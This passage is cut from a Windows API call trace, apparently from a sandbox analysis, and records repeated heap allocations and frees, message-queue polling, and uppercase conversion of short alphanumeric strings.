Size=0x4) returned 0x24b1428 [0204.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0204.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0204.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0204.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0204.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0204.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0204.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0204.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0204.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0204.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0204.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.369] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0204.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0204.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0204.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0204.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0204.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0204.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0204.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0204.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0204.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0204.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0204.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0204.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.369] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0204.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0204.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0204.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0204.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0204.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0204.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0204.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0204.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0204.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0204.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0204.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0204.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.370] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0204.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0204.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0204.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0204.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0204.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0204.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0204.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0204.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0204.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0204.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0204.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0204.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.371] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0204.371] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0204.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0204.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0204.371] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0204.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0204.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0204.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0204.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0204.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.372] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0204.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0204.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0204.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0204.372] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0204.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0204.372] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0204.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0204.373] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0204.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0204.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0204.373] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0204.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0204.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0204.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0204.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0204.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0204.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0204.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.373] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0204.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0204.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0204.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0204.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0204.374] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0204.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0204.374] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0204.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0204.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0204.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0204.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0204.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0204.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0204.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0204.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0204.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0204.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0204.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0204.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0204.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0204.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0204.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0204.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0204.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0204.379] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0204.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0204.379] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0204.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0204.379] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0204.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0204.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0204.379] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0204.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0204.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0204.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0204.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0204.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.380] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0204.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0204.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0204.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0204.380] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0204.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0204.380] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0204.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0204.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0204.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0204.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0204.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0204.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0204.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0204.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0204.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.381] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0204.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0204.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0204.382] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0204.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0204.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.382] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0204.382] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0204.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0204.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0204.382] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0204.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0204.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0204.383] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, 